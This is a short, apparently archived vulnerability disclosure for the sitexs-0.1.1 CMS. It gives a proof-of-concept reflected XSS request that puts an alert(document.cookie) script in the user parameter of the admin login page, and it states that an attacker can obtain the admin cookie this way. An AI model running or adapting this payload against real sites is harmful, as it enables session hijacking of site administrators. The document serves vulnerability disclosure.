XSS Attack

2008-05-0100:00:00

vulners.com

JSON

Author: Hadi Kiamarsi

Discovered By: Hadi Kiamarsi

Exploited By: Hadi Kiamarsi

E-Mail: [email protected]

Web Site: http://ircrash.com

##############################################################################

CMS: sitexs-0.1.1

CMS WebSite: http://sitexs.sf.net

Download CMS: http://heanet.dl.sourceforge.net/sourceforge/sitexs/sitexs-0.1.1.tar.gz

##############################################################################
############################### XSS ########################################

Bug :

Method: POST

Query : [sitexs]/adm/index.php?user=<script>alert(document.cookie)</script>&pass=111

The Impact Of This Vulnerability :

Attacker Can Get Admin Cookie With This Vuln …

JSON